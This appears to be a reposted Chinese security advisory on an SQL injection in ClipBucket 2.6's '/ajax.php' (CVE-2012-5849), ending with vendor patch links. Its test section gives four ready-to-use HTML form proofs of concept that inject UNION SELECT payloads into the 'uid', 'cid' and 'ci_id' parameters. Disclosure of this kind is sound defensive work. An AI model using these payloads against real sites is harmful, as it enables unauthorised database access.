Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / ClipBucket“/ajax.php”脚本SQL注入漏洞

发布日期:2012-12-05
更新日期:2012-12-11受影响系统:
ClipBucket ClipBucket 2.6 Revision 738
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56854
CVE(CAN) ID: CVE-2012-5849ClipBucket是开源的自由视频共享软件。ClipBucket 2.6 Revision 738及之前版本对"/ajax.php"脚本内的多个参数值过滤不正确,远程攻击者可通过发送特制的HTTP POST请求,导致在应用的数据库内执行任意SQL查询。受影响参数包括:"uid"、"id" 、"cid"、"ci_id"<*来源:High-Tech Bridge Security Research Lab
 
  链接:https://www.htbridge.com/advisory/HTB23125
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!PoC 1:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="add_friend" />
<input type="hidden" name="uid" value="" UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10 -- " />
<input type="submit" id="btn">
</form>
PoC 2:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="get_item" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="hidden" name="ci_id" value="" />
<input type="submit" id="btn">
</form>
PoC 3:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="get_item" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="" />
<input type="hidden" name="ci_id" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit" id="btn">
</form>
PoC 4:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" name="mode" value="load_more_items" />
<input type="hidden" name="type" value="[videos|photos]" />
<input type="hidden" name="cid" value="0" UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit" id="btn">
</form>建议:
--------------------------------------------------------------------------------
厂商补丁:ClipBucket
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://clip-bucket.com/
http://sourceforge.net/projects/clipbucket/files/Patches/
http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/IBM Flex System CMM/IMM2 Module凭证泄露漏洞Achievo “include.php” 跨站脚本漏洞相关资讯      SQL注入漏洞  ClipBucket安全漏洞 
  • 已经 14 岁的 SQL 注入仍然是最危  (08/29/2013 13:12:18)
  • TYPO3 WEC 讨论区SQL注入漏洞  (02/22/2013 08:55:37)
  • MyBB HM_My Country Flags 插件"  (12/28/2012 12:15:26)
  • TYPO3 My quiz and poll Extension  (02/22/2013 08:56:41)
  • Dedecms v5.7 plusfeedback.php   (01/02/2013 08:38:51)
  • MyBB Awaylist index.php "id"参数  (12/27/2012 08:29:11)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图